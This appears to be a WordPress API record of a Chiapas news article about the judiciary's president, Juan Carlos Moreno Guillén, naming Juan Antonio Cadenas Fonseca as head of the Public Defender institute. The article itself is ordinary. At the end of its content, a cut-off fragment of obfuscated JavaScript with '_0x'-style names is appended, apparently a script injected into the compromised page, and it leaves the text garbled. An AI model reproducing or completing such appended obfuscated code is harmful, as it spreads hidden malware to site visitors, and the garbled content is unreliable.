{"id":23446,"date":"2025-08-12T02:14:00","date_gmt":"2025-08-12T02:14:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23446"},"modified":"2025-08-12T02:14:01","modified_gmt":"2025-08-12T02:14:01","slug":"juan-carlos-moreno-guillen-llama-a-fortalecer-la-atencion-con-humanismo-y-cercania","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23446","title":{"rendered":"Juan Carlos Moreno Guill\u00e9n llama a fortalecer la atenci\u00f3n con humanismo y cercan\u00eda"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000273164-1024x681.jpg\" alt=\"\" class=\"wp-image-23447\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000273164-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000273164-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000273164-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000273164-1536x1022.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000273164-2048x1362.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000273164-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>-Nombran a nuevo titular del Instituto de la Defensor\u00eda P\u00fablica del Poder Judicial del Estado.<\/p>\n\n\n\n<p>11 de agosto del 2025. En un acto encabezado por el magistrado presidente del Poder Judicial del Estado de Chiapas, Juan Carlos Moreno Guill\u00e9n, donde present\u00f3 a Juan Antonio Cadenas Fonseca como nuevo titular del Instituto de la Defensor\u00eda P\u00fablica, hizo un llamado a fortalecer la atenci\u00f3n con humanismo y cercan\u00eda hacia las personas usuarias.<\/p>\n\n\n\n<p>Desde las instalaciones de la sede judicial en el fraccionamiento Las Torres, Moreno Guill\u00e9n subray\u00f3 que como servidoras y servidores judiciales, tenemos la responsabilidad de recibir de manera cordial a la poblaci\u00f3n, y atenderles con \u00e9tica, principios y empat\u00eda como dignos representantes del nuevo rostro de esta casa de la justicia.<\/p>\n\n\n\n<p>En su mensaje, el magistrado presidente exhort\u00f3 al nuevo director a conducir con responsabilidad y compromiso la importante labor de la Defensor\u00eda P\u00fablica, as\u00ed como a mantener un trabajo unido y una comunicaci\u00f3n abierta al interior de este Poder Judicial.<\/p>\n\n\n\n<p>Por su parte, Cadenas Fonseca agradeci\u00f3 la confianza depositada en su persona y celebr\u00f3 las acciones impulsadas en esta nueva administraci\u00f3n para dignificar el trabajo jurisdiccional, asimismo refrend\u00f3 su compromiso de continuar mejorando paso a paso los servicios en cada sede de la Defensor\u00eda.<\/p>\n\n\n\n<p>Con este nombramiento, el Poder Judicial del Estado reafirma su compromiso de garantizar un acceso real y equitativo a la justicia, priorizando el respeto a los derechos humanos y el fortalecimiento institucional en beneficio de quienes m\u00e1s lo necesitan.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>-Nombran a nuevo titular del Instituto de la Defensor\u00eda P\u00fablica del Poder Judicial del Estado. 11 de agosto del 2025. En un acto encabezado por el magistrado presidente del Poder Judicial del Estado de Chiapas, Juan Carlos Moreno Guill\u00e9n, donde present\u00f3 a Juan Antonio Cadenas Fonseca como nuevo titular del Instituto de la Defensor\u00eda P\u00fablica, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23447,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23446","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23446","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23446"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23446\/revisions"}],"predecessor-version":[{"id":23448,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23446\/revisions\/23448"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23447"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23446"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23446"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23446"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}